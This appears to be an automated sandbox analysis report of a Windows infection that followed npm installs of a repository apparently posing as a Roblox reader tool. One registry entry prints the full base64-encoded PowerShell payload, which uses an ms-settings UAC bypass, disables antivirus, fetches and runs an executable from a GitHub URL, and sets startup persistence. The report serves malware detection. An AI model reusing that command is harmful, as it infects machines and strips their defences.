Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command\	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\j5xykow0vq4htf1xe8ko	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\011B2C6A4395F7A48B1C157EDC15FF28\EnvironmentPathNode = "EnvironmentPath"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\011B2C6A4395F7A48B1C157EDC15FF28	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\011B2C6A4395F7A48B1C157EDC15FF28\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\011B2C6A4395F7A48B1C157EDC15FF28\AdvertiseFlags = "388"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.gitignore\PerceivedType = "text"	Git-2.47.1-64-bit.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\ms-settings\Shell\Open\command\ = "C:\\WindowsApi\\52e8692e75c631390adc1f931d431f808cde0d53.exe /c powershell -Command \"$b64 = 'JHBzV2luZG93PShHZXQtUHJvY2VzcyAtSWQgJFBJRCkuTWFpbldpbmRvd0hhbmRsZTtBZGQtVHlwZSAtVHlwZURlZmluaXRpb24gJ3VzaW5nIFN5c3RlbTt1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7cHVibGljIGNsYXNzIFdpbkFQSXtbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildcHVibGljIHN0YXRpYyBleHRlcm4gYm9vbCBTaG93V2luZG93KEludFB0ciBoV25kLGludCBuQ21kU2hvdyk7fTsnO1tXaW5BUEldOjpTaG93V2luZG93KCRwc1dpbmRvdyw2KTtpZihHZXQtU2VydmljZSBNQkFNU2VydmljZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZXxXaGVyZS1PYmplY3R7JF8uU3RhdHVzLWVxJ1J1bm5pbmcnfSl7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIkM6XFByb2dyYW0gRmlsZXNcTWFsd2FyZWJ5dGVzXEFudGktTWFsd2FyZVxtYWx3YXJlYnl0ZXNhc3Npc3RhbnQuZXhlIiAtQXJndW1lbnRMaXN0ICItLXN0b3BzZXJ2aWNlIn07R2V0LUNpbUluc3RhbmNlIC1DbGFzc05hbWUgV2luMzJfTG9naWNhbERpc2t8V2hlcmUtT2JqZWN0eyRfLkRyaXZlVHlwZS1lcSAzfXxGb3JFYWNoLU9iamVjdHtBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICgkXy5EZXZpY2VJRC5UcmltKCkrIlwiKX07JHU9Imh0dHBzOi8vZ2l0aHViLmNvbS9taWNoZWFsamFtZXM5Ni9yb2JJb3gtY2RuL3Jhdy9yZWZzL2hlYWRzL21haW4vT25lZHJpdmUuZXhlIjskcD0iJGVudjpURU1QXE9uZWRyaXZlLmV4ZSI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdSAtT3V0RmlsZSAkcCAtVXNlQmFzaWNQYXJzaW5nO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICRwIC1WZXJiIFJ1bkFzOyRzdGFydHVwS2V5PSJIS0NVOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxSdW4iO1NldC1JdGVtUHJvcGVydHkgLVBhdGggJHN0YXJ0dXBLZXkgLU5hbWUgIk9uZWRyaXZlIiAtVmFsdWUgJHAgLUZvcmNl'; $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64)); Invoke-Expression $decoded\""	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\j5xykow0vq4htf1xe8ko\Shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\011B2C6A4395F7A48B1C157EDC15FF28	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\011B2C6A4395F7A48B1C157EDC15FF28\PackageCode = "7ADA4E96FE88DF64FB4F54512750A882"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\git_shell	Git-2.47.1-64-bit.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\background\shell\git_shell\ = "Open Git Ba&sh here"	Git-2.47.1-64-bit.tmp

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 862287.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Git-2.47.1-64-bit.exe:Zone.Identifier	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

pid	Process
3460	msiexec.exe
3460	msiexec.exe
1180	node.exe
1180	node.exe
4876	node.exe
4876	node.exe
5432	msedge.exe
5432	msedge.exe
4904	msedge.exe
4904	msedge.exe
6024	msedge.exe
6024	msedge.exe
6016	identity_helper.exe
6016	identity_helper.exe
5228	msedge.exe
5228	msedge.exe
6024	msedge.exe
6024	msedge.exe
5228	msedge.exe
5228	msedge.exe
4776	msedge.exe
4776	msedge.exe
2292	msedge.exe
2292	msedge.exe
4208	msedge.exe
4208	msedge.exe
956	identity_helper.exe
956	identity_helper.exe
4240	node.exe
4240	node.exe
5200	node.exe
5200	node.exe
5368	node.exe
5368	node.exe
5856	powershell.exe
5856	powershell.exe
564	powershell.exe
564	powershell.exe
564	powershell.exe
564	powershell.exe
564	powershell.exe
3480	Onedrive.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 23 IoCs

pid	Process
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2796	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2796	msiexec.exe
Token: SeSecurityPrivilege	3460	msiexec.exe
Token: SeCreateTokenPrivilege	2796	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2796	msiexec.exe
Token: SeLockMemoryPrivilege	2796	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2796	msiexec.exe
Token: SeMachineAccountPrivilege	2796	msiexec.exe
Token: SeTcbPrivilege	2796	msiexec.exe
Token: SeSecurityPrivilege	2796	msiexec.exe
Token: SeTakeOwnershipPrivilege	2796	msiexec.exe
Token: SeLoadDriverPrivilege	2796	msiexec.exe
Token: SeSystemProfilePrivilege	2796	msiexec.exe
Token: SeSystemtimePrivilege	2796	msiexec.exe
Token: SeProfSingleProcessPrivilege	2796	msiexec.exe
Token: SeIncBasePriorityPrivilege	2796	msiexec.exe
Token: SeCreatePagefilePrivilege	2796	msiexec.exe
Token: SeCreatePermanentPrivilege	2796	msiexec.exe
Token: SeBackupPrivilege	2796	msiexec.exe
Token: SeRestorePrivilege	2796	msiexec.exe
Token: SeShutdownPrivilege	2796	msiexec.exe
Token: SeDebugPrivilege	2796	msiexec.exe
Token: SeAuditPrivilege	2796	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2796	msiexec.exe
Token: SeChangeNotifyPrivilege	2796	msiexec.exe
Token: SeRemoteShutdownPrivilege	2796	msiexec.exe
Token: SeUndockPrivilege	2796	msiexec.exe
Token: SeSyncAgentPrivilege	2796	msiexec.exe
Token: SeEnableDelegationPrivilege	2796	msiexec.exe
Token: SeManageVolumePrivilege	2796	msiexec.exe
Token: SeImpersonatePrivilege	2796	msiexec.exe
Token: SeCreateGlobalPrivilege	2796	msiexec.exe
Token: SeCreateTokenPrivilege	2796	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2796	msiexec.exe
Token: SeLockMemoryPrivilege	2796	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2796	msiexec.exe
Token: SeMachineAccountPrivilege	2796	msiexec.exe
Token: SeTcbPrivilege	2796	msiexec.exe
Token: SeSecurityPrivilege	2796	msiexec.exe
Token: SeTakeOwnershipPrivilege	2796	msiexec.exe
Token: SeLoadDriverPrivilege	2796	msiexec.exe
Token: SeSystemProfilePrivilege	2796	msiexec.exe
Token: SeSystemtimePrivilege	2796	msiexec.exe
Token: SeProfSingleProcessPrivilege	2796	msiexec.exe
Token: SeIncBasePriorityPrivilege	2796	msiexec.exe
Token: SeCreatePagefilePrivilege	2796	msiexec.exe
Token: SeCreatePermanentPrivilege	2796	msiexec.exe
Token: SeBackupPrivilege	2796	msiexec.exe
Token: SeRestorePrivilege	2796	msiexec.exe
Token: SeShutdownPrivilege	2796	msiexec.exe
Token: SeDebugPrivilege	2796	msiexec.exe
Token: SeAuditPrivilege	2796	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2796	msiexec.exe
Token: SeChangeNotifyPrivilege	2796	msiexec.exe
Token: SeRemoteShutdownPrivilege	2796	msiexec.exe
Token: SeUndockPrivilege	2796	msiexec.exe
Token: SeSyncAgentPrivilege	2796	msiexec.exe
Token: SeEnableDelegationPrivilege	2796	msiexec.exe
Token: SeManageVolumePrivilege	2796	msiexec.exe
Token: SeImpersonatePrivilege	2796	msiexec.exe
Token: SeCreateGlobalPrivilege	2796	msiexec.exe
Token: SeCreateTokenPrivilege	2796	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2796	msiexec.exe
Token: SeLockMemoryPrivilege	2796	msiexec.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2796	msiexec.exe
2796	msiexec.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
5432	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe
2292	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1732	MiniSearchHost.exe
3480	Onedrive.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3460 wrote to memory of 5632	3460	msiexec.exe	83
PID 3460 wrote to memory of 5632	3460	msiexec.exe	83
PID 3460 wrote to memory of 4348	3460	msiexec.exe	87
PID 3460 wrote to memory of 4348	3460	msiexec.exe	87
PID 3460 wrote to memory of 2328	3460	msiexec.exe	89
PID 3460 wrote to memory of 2328	3460	msiexec.exe	89
PID 3460 wrote to memory of 976	3460	msiexec.exe	90
PID 3460 wrote to memory of 976	3460	msiexec.exe	90
PID 3460 wrote to memory of 6032	3460	msiexec.exe	92
PID 3460 wrote to memory of 6032	3460	msiexec.exe	92
PID 3460 wrote to memory of 6032	3460	msiexec.exe	92
PID 3160 wrote to memory of 1564	3160	cmd.exe	96
PID 3160 wrote to memory of 1564	3160	cmd.exe	96
PID 1564 wrote to memory of 5080	1564	cmd.exe	97
PID 1564 wrote to memory of 5080	1564	cmd.exe	97
PID 3160 wrote to memory of 1180	3160	cmd.exe	98
PID 3160 wrote to memory of 1180	3160	cmd.exe	98
PID 3160 wrote to memory of 5224	3160	cmd.exe	99
PID 3160 wrote to memory of 5224	3160	cmd.exe	99
PID 5224 wrote to memory of 428	5224	cmd.exe	100
PID 5224 wrote to memory of 428	5224	cmd.exe	100
PID 3160 wrote to memory of 4876	3160	cmd.exe	101
PID 3160 wrote to memory of 4876	3160	cmd.exe	101
PID 5432 wrote to memory of 4632	5432	msedge.exe	103
PID 5432 wrote to memory of 4632	5432	msedge.exe	103
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104
PID 5432 wrote to memory of 5672	5432	msedge.exe	104

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\node-v22.11.0-x64.msi
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2796

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:1732

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3460
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding 0A3C3EE27BCAF710F940DC1023D0F057 C
  2⤵
  - Loads dropped DLL
  PID:5632
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:4348
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding 17D1305C2B392F8CF060BC20B7382C9C
  2⤵
  - Loads dropped DLL
  PID:2328
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding E9CE30EEBB05332CC7B7D9256594870B E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:976
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A44223BE5D8FACDA92D06772628D0B9F
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:6032

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:792

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6140

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c CALL "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-prefix.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1564
- - C:\Program Files\nodejs\node.exe
    "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-prefix.js"
    3⤵
    - Executes dropped EXE
    PID:5080
- C:\Program Files\nodejs\node.exe
  "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-cli.js" i https://github.com/robloxopesrc/rbx-reader-ts
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:1180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c CALL "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-prefix.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5224
- - C:\Program Files\nodejs\node.exe
    "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-prefix.js"
    3⤵
    - Executes dropped EXE
    PID:428
- C:\Program Files\nodejs\node.exe
  "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-cli.js" i github:robloxopesrc/rbx-reader-ts
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:4876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c CALL "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-prefix.js"
  2⤵
  PID:400
- - C:\Program Files\nodejs\node.exe
    "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-prefix.js"
    3⤵
    - Executes dropped EXE
    PID:4296
- C:\Program Files\nodejs\node.exe
  "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-cli.js" i github:robloxopensrc/rbx-reader-ts
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:4240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcac323cb8,0x7ffcac323cc8,0x7ffcac323cd8
  2⤵
  PID:4632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1876 /prefetch:2
  2⤵
  PID:5672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2508 /prefetch:8
  2⤵
  PID:5536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
  2⤵
  PID:5952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
  2⤵
  PID:5944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:1
  2⤵
  PID:5308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4672 /prefetch:1
  2⤵
  PID:4420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3552 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6024
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3772 /prefetch:1
  2⤵
  PID:5996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
  2⤵
  PID:3196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:1
  2⤵
  PID:1180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:1
  2⤵
  PID:3820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
  2⤵
  PID:3912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1936 /prefetch:1
  2⤵
  PID:4068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
  2⤵
  PID:4228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,12772239531849003905,11740820474529998799,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
  2⤵
  PID:5668
